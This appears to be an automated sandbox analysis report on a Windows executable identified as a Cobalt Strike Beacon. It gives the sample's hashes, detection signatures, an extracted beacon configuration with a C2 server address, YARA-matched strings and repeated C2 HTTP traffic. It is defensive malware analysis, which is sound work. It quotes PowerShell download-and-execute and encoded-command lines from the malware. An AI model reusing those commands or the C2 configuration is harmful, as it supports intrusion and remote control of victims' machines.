Windows Analysis Report
yZah650lHL.exe

Overview

General Information

Sample name: yZah650lHL.exe (renamed because original name is a hash value)
Original sample name: 5ed55475a1fe6c18c1a67fa8c7008661.exe
Analysis ID: 1583548
MD5: 5ed55475a1fe6c18c1a67fa8c7008661
SHA1: 4ecc93379148eefce19f8f6ded6d141f7100bbcb
SHA256: 57a370d35e41f662454ba59baeddf042cb536c75e92e6022a63de197fd1377ba
Tags: CobaltStrike, exe, user-abuse_ch

Detection

CobaltStrike
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (creates a PE file in dynamic memory)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected CobaltStrike
Yara detected Powershell download and execute
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to detect sleep reduction / modifications
Found API chain indicative of debugger detection
Found potential dummy code loops (likely to delay analysis)
Installs new ROOT certificates
Machine Learning detection for sample
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
Program does not show much activity (idle)
Sample execution stops while process was sleeping (likely an evasion)
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • yZah650lHL.exe (PID: 6572 cmdline: "C:\Users\user\Desktop\yZah650lHL.exe" MD5: 5ED55475A1FE6C18C1A67FA8C7008661)
  • cleanup
Name: Cobalt Strike, CobaltStrike
Description: Cobalt Strike is a paid penetration testing product that allows an attacker to deploy an agent named 'Beacon' on the victim machine. Beacon includes a wealth of functionality to the attacker, including, but not limited to command execution, key logging, file transfer, SOCKS proxying, privilege escalation, mimikatz, port scanning and lateral movement. Beacon is in-memory/file-less, in that it consists of stageless or multi-stage shellcode that once loaded by exploiting a vulnerability or executing a shellcode loader, will reflectively load itself into the memory of a process without touching the disk. It supports C2 and staging over HTTP, HTTPS, DNS, SMB named pipes as well as forward and reverse TCP; Beacons can be daisy-chained. Cobalt Strike comes with a toolkit for developing shellcode loaders, called Artifact Kit. The Beacon implant has become popular amongst targeted attackers and criminal users as it is well written, stable, and highly customizable.
Attribution:
  • APT 29
  • APT32
  • APT41
  • AQUATIC PANDA
  • Anunak
  • Cobalt
  • Codoso
  • CopyKittens
  • DarkHydrus
  • Earth Baxia
  • FIN6
  • FIN7
  • Leviathan
  • Mustang Panda
  • Shell Crew
  • Stone Panda
  • TianWu
  • UNC1878
  • UNC2452
  • Winnti Umbrella
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike
{"BeaconType": ["HTTPS"], "Port": 443, "SleepTime": 60000, "MaxGetSize": 1048576, "Jitter": 0, "C2Server": "42.192.3.170,/dpixel", "HttpPostUri": "/submit.php", "Malleable_C2_Instructions": [], "HttpGet_Verb": "GET", "HttpPost_Verb": "POST", "HttpPostChunk": 0, "Spawnto_x86": "%windir%\\syswow64\\rundll32.exe", "Spawnto_x64": "%windir%\\sysnative\\rundll32.exe", "CryptoScheme": 0, "Proxy_Behavior": "Use IE settings", "Watermark": 987654321, "bStageCleanup": "False", "bCFGCaution": "False", "KillDate": 0, "bProcInject_StartRWX": "True", "bProcInject_UseRWX": "True", "bProcInject_MinAllocSize": 0, "ProcInject_PrependAppend_x86": "Empty", "ProcInject_PrependAppend_x64": "Empty", "ProcInject_Execute": ["CreateThread", "SetThreadContext", "CreateRemoteThread", "RtlCreateUserThread"], "ProcInject_AllocationMethod": "VirtualAllocEx", "bUsesCookies": "True", "HostHeader": ""}
Source | Rule | Description | Author | Strings
00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_CobaltStrike | Yara detected CobaltStrike | Joe Security
00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_CobaltStrike_3 | Yara detected CobaltStrike | Joe Security
00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_CobaltStrike_ee756db7 | Attempts to detect Cobalt Strike based on strings found in BEACON | unknown
      • 0x329a3:$a1: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
      • 0x32a1b:$a2: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
      • 0x33180:$a3: ppid %d is in a different desktop session (spawned jobs may fail). Use 'ppid' to reset.
      • 0x334b2:$a4: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s
      • 0x33444:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/')
      • 0x334b2:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/')
      • 0x32a7e:$a6: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
      • 0x32c0f:$a7: could not run command (w/ token) because of its length of %d bytes!
      • 0x32ac4:$a8: %s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s
      • 0x32b02:$a9: %s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s
      • 0x334fc:$a10: powershell -nop -exec bypass -EncodedCommand "%s"
      • 0x32d6a:$a11: Could not open service control manager on %s: %d
      • 0x3329c:$a12: %d is an x64 process (can't inject x86 content)
      • 0x332cc:$a13: %d is an x86 process (can't inject x64 content)
      • 0x335ed:$a14: Failed to impersonate logged on user %d (%u)
      • 0x33255:$a15: could not create remote thread in %d: %d
      • 0x32b38:$a16: %s.1%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
      • 0x33203:$a17: could not write to process memory: %d
      • 0x32d9b:$a18: Could not create service %s on %s: %d
      • 0x32e24:$a19: Could not delete service %s on %s: %d
      • 0x32c89:$a20: Could not open process token: %d (%u)
00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_CobaltStrike_663fc95d | Identifies CobaltStrike via unidentified function code | unknown
      • 0x1d93c:$a: 48 89 5C 24 08 57 48 83 EC 20 48 8B 59 10 48 8B F9 48 8B 49 08 FF 17 33 D2 41 B8 00 80 00 00
00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_CobaltStrike_f0b627fc | Rule for beacon reflective loader | unknown
      • 0x1956a:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
      • 0x1a89b:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
Source | Rule | Description | Author | Strings
0.2.yZah650lHL.exe.660000.2.raw.unpack | JoeSecurity_CobaltStrike | Yara detected CobaltStrike | Joe Security
0.2.yZah650lHL.exe.660000.2.raw.unpack | JoeSecurity_CobaltStrike_3 | Yara detected CobaltStrike | Joe Security
0.2.yZah650lHL.exe.660000.2.raw.unpack | Windows_Trojan_CobaltStrike_ee756db7 | Attempts to detect Cobalt Strike based on strings found in BEACON | unknown
0.2.yZah650lHL.exe.660000.2.raw.unpack | Windows_Trojan_CobaltStrike_663fc95d | Identifies CobaltStrike via unidentified function code | unknown
0.2.yZah650lHL.exe.660000.2.raw.unpack | Windows_Trojan_CobaltStrike_f0b627fc | Rule for beacon reflective loader | unknown
          No Sigma rule has matched
          2025-01-03T02:54:38.260748+010020337131Targeted Malicious Activity was Detected192.168.2.45008542.192.3.170443TCP
          2025-01-03T02:54:40.043317+010020337131Targeted Malicious Activity was Detected192.168.2.45008642.192.3.170443TCP
          2025-01-03T02:54:41.984732+010020337131Targeted Malicious Activity was Detected192.168.2.45008742.192.3.170443TCP
          2025-01-03T02:54:43.955267+010020337131Targeted Malicious Activity was Detected192.168.2.45008842.192.3.170443TCP
          2025-01-03T02:54:45.911290+010020337131Targeted Malicious Activity was Detected192.168.2.45008942.192.3.170443TCP
          2025-01-03T02:54:48.044208+010020337131Targeted Malicious Activity was Detected192.168.2.45009042.192.3.170443TCP
          2025-01-03T02:54:49.881590+010020337131Targeted Malicious Activity was Detected192.168.2.45009142.192.3.170443TCP
          2025-01-03T02:54:51.888912+010020337131Targeted Malicious Activity was Detected192.168.2.45009242.192.3.170443TCP
          2025-01-03T02:54:53.979784+010020337131Targeted Malicious Activity was Detected192.168.2.45009342.192.3.170443TCP
          2025-01-03T02:54:55.945957+010020337131Targeted Malicious Activity was Detected192.168.2.45009442.192.3.170443TCP
          2025-01-03T02:54:57.851375+010020337131Targeted Malicious Activity was Detected192.168.2.45009542.192.3.170443TCP
          2025-01-03T02:54:59.879305+010020337131Targeted Malicious Activity was Detected192.168.2.45009642.192.3.170443TCP
          2025-01-03T02:55:01.744485+010020337131Targeted Malicious Activity was Detected192.168.2.45009742.192.3.170443TCP
          2025-01-03T02:55:03.601934+010020337131Targeted Malicious Activity was Detected192.168.2.45009842.192.3.170443TCP
          2025-01-03T02:55:05.496469+010020337131Targeted Malicious Activity was Detected192.168.2.45009942.192.3.170443TCP
          2025-01-03T02:55:07.339832+010020337131Targeted Malicious Activity was Detected192.168.2.45010042.192.3.170443TCP
          2025-01-03T02:55:09.200269+010020337131Targeted Malicious Activity was Detected192.168.2.45010142.192.3.170443TCP
          2025-01-03T02:55:11.302692+010020337131Targeted Malicious Activity was Detected192.168.2.45010242.192.3.170443TCP
          2025-01-03T02:55:13.185010+010020337131Targeted Malicious Activity was Detected192.168.2.45010342.192.3.170443TCP
          2025-01-03T02:55:15.197485+010020337131Targeted Malicious Activity was Detected192.168.2.45010442.192.3.170443TCP
          2025-01-03T02:55:17.011739+010020337131Targeted Malicious Activity was Detected192.168.2.45010542.192.3.170443TCP
          2025-01-03T02:55:18.855270+010020337131Targeted Malicious Activity was Detected192.168.2.45010642.192.3.170443TCP
          2025-01-03T02:55:20.722679+010020337131Targeted Malicious Activity was Detected192.168.2.45010742.192.3.170443TCP
          2025-01-03T02:55:22.543460+010020337131Targeted Malicious Activity was Detected192.168.2.45010842.192.3.170443TCP
          2025-01-03T02:55:24.446011+010020337131Targeted Malicious Activity was Detected192.168.2.45010942.192.3.170443TCP
          2025-01-03T02:55:26.268646+010020337131Targeted Malicious Activity was Detected192.168.2.45011042.192.3.170443TCP
          2025-01-03T02:55:28.099338+010020337131Targeted Malicious Activity was Detected192.168.2.45011142.192.3.170443TCP
          2025-01-03T02:55:29.944259+010020337131Targeted Malicious Activity was Detected192.168.2.45011242.192.3.170443TCP
          2025-01-03T02:55:31.762391+010020337131Targeted Malicious Activity was Detected192.168.2.45011342.192.3.170443TCP
          2025-01-03T02:55:33.614935+010020337131Targeted Malicious Activity was Detected192.168.2.45011442.192.3.170443TCP
          2025-01-03T02:55:35.425741+010020337131Targeted Malicious Activity was Detected192.168.2.45011542.192.3.170443TCP
          2025-01-03T02:55:37.313533+010020337131Targeted Malicious Activity was Detected192.168.2.45011642.192.3.170443TCP
          2025-01-03T02:55:39.187290+010020337131Targeted Malicious Activity was Detected192.168.2.45011742.192.3.170443TCP
          2025-01-03T02:55:41.079453+010020337131Targeted Malicious Activity was Detected192.168.2.45011842.192.3.170443TCP
          2025-01-03T02:55:43.031406+010020337131Targeted Malicious Activity was Detected192.168.2.45011942.192.3.170443TCP
          2025-01-03T02:55:44.973875+010020337131Targeted Malicious Activity was Detected192.168.2.45012042.192.3.170443TCP
          2025-01-03T02:55:46.804472+010020337131Targeted Malicious Activity was Detected192.168.2.45012142.192.3.170443TCP
          2025-01-03T02:55:48.701107+010020337131Targeted Malicious Activity was Detected192.168.2.45012242.192.3.170443TCP
          2025-01-03T02:55:50.593240+010020337131Targeted Malicious Activity was Detected192.168.2.45012342.192.3.170443TCP
          2025-01-03T02:55:52.501076+010020337131Targeted Malicious Activity was Detected192.168.2.45012442.192.3.170443TCP
          2025-01-03T02:55:54.409589+010020337131Targeted Malicious Activity was Detected192.168.2.45012542.192.3.170443TCP
          2025-01-03T02:55:56.241086+010020337131Targeted Malicious Activity was Detected192.168.2.45012642.192.3.170443TCP
          2025-01-03T02:55:58.541173+010020337131Targeted Malicious Activity was Detected192.168.2.45012742.192.3.170443TCP
          2025-01-03T02:56:00.376765+010020337131Targeted Malicious Activity was Detected192.168.2.45012842.192.3.170443TCP

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          Source: yZah650lHL.exe, Avira: detected
          Source: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Malware Configuration Extractor: CobaltStrike {"BeaconType": ["HTTPS"], "Port": 443, "SleepTime": 60000, "MaxGetSize": 1048576, "Jitter": 0, "C2Server": "42.192.3.170,/dpixel", "HttpPostUri": "/submit.php", "Malleable_C2_Instructions": [], "HttpGet_Verb": "GET", "HttpPost_Verb": "POST", "HttpPostChunk": 0, "Spawnto_x86": "%windir%\\syswow64\\rundll32.exe", "Spawnto_x64": "%windir%\\sysnative\\rundll32.exe", "CryptoScheme": 0, "Proxy_Behavior": "Use IE settings", "Watermark": 987654321, "bStageCleanup": "False", "bCFGCaution": "False", "KillDate": 0, "bProcInject_StartRWX": "True", "bProcInject_UseRWX": "True", "bProcInject_MinAllocSize": 0, "ProcInject_PrependAppend_x86": "Empty", "ProcInject_PrependAppend_x64": "Empty", "ProcInject_Execute": ["CreateThread", "SetThreadContext", "CreateRemoteThread", "RtlCreateUserThread"], "ProcInject_AllocationMethod": "VirtualAllocEx", "bUsesCookies": "True", "HostHeader": ""}
          Source: yZah650lHL.exe, Virustotal: Detection: 80%
          Source: yZah650lHL.exe, ReversingLabs: Detection: 86%
          Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
          Source: yZah650lHL.exe, Joe Sandbox ML: detected
          Source: C:\Users\user\Desktop\yZah650lHL.exe, Code function: 0_2_00661184 CryptAcquireContextA, CryptAcquireContextA, CryptGenRandom, CryptReleaseContext
          Source: C:\Users\user\Desktop\yZah650lHL.exe, Code function: 0_2_00692020 CryptGenRandom

          Compliance

          Source: C:\Users\user\Desktop\yZah650lHL.exe, Unpacked PE file: 0.2.yZah650lHL.exe.660000.2.unpack
          Source: unknown, HTTPS traffic detected: 42.192.3.170:443 -> 192.168.2.4:49730 version: TLS 1.2
          Source: unknown, HTTPS traffic detected: 42.192.3.170:443 -> 192.168.2.4:50064 version: TLS 1.2
          Source: C:\Users\user\Desktop\yZah650lHL.exe, Code function: 0_2_00679220 malloc, _snprintf, FindFirstFileA, free, malloc, _snprintf, free, FindNextFileA, FindClose
          Source: C:\Users\user\Desktop\yZah650lHL.exe, Code function: 0_2_00671C30 malloc, GetCurrentDirectoryA, FindFirstFileA, GetLastError, free, free, FileTimeToSystemTime, SystemTimeToTzSpecificLocalTime, FindNextFileA, FindClose
          Source: C:\Users\user\Desktop\yZah650lHL.exe, Code function: 4x nop then sub rsp, 28h (0_2_00402314)

          Networking

          Source: Network traffic, Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49750 -> 42.192.3.170:443
          Source: Malware configuration extractor, URLs: 42.192.3.170
          Source: Joe Sandbox View, ASN Name: LILLY-ASUS LILLY-ASUS
          Source: Joe Sandbox View, JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
          Source: Network traffic, Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49736 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49735 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49731 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49734 -> 42.192.3.170:443
          Source: global traffic HTTP traffic detected: GET /dpixel HTTP/1.1 Accept: */* Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Host: 42.192.3.170 Connection: Keep-Alive Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
